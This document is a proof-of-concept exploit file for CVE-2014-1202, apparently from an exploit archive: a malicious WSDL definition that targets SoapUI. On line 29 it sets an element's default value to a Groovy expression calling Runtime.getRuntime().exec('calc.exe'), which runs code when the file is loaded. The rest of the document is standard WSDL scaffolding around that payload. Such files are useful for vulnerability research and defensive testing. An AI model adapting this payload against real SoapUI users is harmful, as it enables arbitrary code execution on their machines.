Malicious WSDL CVE-2014-1202

1. <!--Malicious WSDL File, SoapUI Code Execution Vulnerability CVE-2014-1202, Barak Tawily-->
2. <wsdl:definitions targetNamespace="http://example.companyInfo"
3. xmlns:tns="http://example.companyInfo"
4. xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/"
5. xmlns:wsdlsoap="http://schemas.xmlsoap.org/wsdl/soap/"
6. xmlns:wsdlmime="http://schemas.xmlsoap.org/wsdl/mime/"
7. xmlns:xsd="http://www.w3.org/2001/XMLSchema">
8.  
9. <wsdl:types>
10. <xsd:schema elementFormDefault="qualified"
11. targetNamespace="http://example.header">
12.  
13. <xsd:element name="sampleHeader">
14. <xsd:complexType>
15. <xsd:all>
16. <xsd:element name="priority" type="xsd:int"/>
17. </xsd:all>
18. </xsd:complexType>
19. </xsd:element>
20. </xsd:schema>
21.  
22.  
23. <xsd:schema elementFormDefault="qualified"
24. targetNamespace="http://example.companyInfo">
25.  
26. <xsd:element name="Payload_Request">
27. <xsd:complexType>
28. <xsd:all>
29. <xsd:element name="Payload" default="${=Runtime.getRuntime().exec('calc.exe')};" type="xsd:string"/>
30. </xsd:all>
31. </xsd:complexType>
32. </xsd:element>
33.  
34. <xsd:element name="Payload_RequestResult">
35. <xsd:complexType>
36. <xsd:all>
37. <xsd:element name="result" type="xsd:float"/>
38. </xsd:all>
39. </xsd:complexType>
40. </xsd:element>
41. </xsd:schema>
42.  
43.  
44. </wsdl:types>
45.  
46. <wsdl:message name="Payload_RequestRequest">
47. <wsdl:part name="part1" element="tns:Payload_Request"/>
48. </wsdl:message>
49.  
50. <wsdl:message name="Payload_RequestResponse">
51. <wsdl:part name="part1" element="tns:Payload_RequestResult"/>
52. <wsdl:part name="part2" type="xsd:string"/>
53. <wsdl:part name="part3" type="xsd:base64Binary"/>
54. </wsdl:message>
55.  
56. <wsdl:portType name="CompanyInfo">
57. <wsdl:operation name="Payload_Request">
58. <wsdl:input message="tns:Payload_RequestRequest"
59. name="Payload_RequestRequest"/>
60. <wsdl:output message="tns:Payload_RequestResponse"
61. name="Payload_RequestResponse"/>
62. </wsdl:operation>
63. </wsdl:portType>
64.  
65. <wsdl:binding name="Exploit" type="tns:CompanyInfo">
66. <wsdlsoap:binding style="document" transport="http://schemas.xmlsoap.org/soap/http"/>
67.  
68. <wsdl:operation name="Payload_Request">
69. <wsdlsoap:operation soapAction=""/>
70. <wsdl:input name="Payload_RequestRequest">
71. <wsdlsoap:body use="literal"/>
72. </wsdl:input>
73. <wsdl:output name="Payload_RequestResponse">
74. <wsdlsoap:body use="literal"/>
75. </wsdl:output>
76. </wsdl:operation>
77. </wsdl:binding>
78.  
79. <wsdl:service name="CompanyInfoService">
80. <wsdl:port binding="tns:Exploit" name="SOAPPort">
81. <wsdlsoap:address location="http://somewhere/services/CompanyInfoService"/>
82. </wsdl:port>
83. </wsdl:service>
84.  
85. </wsdl:definitions>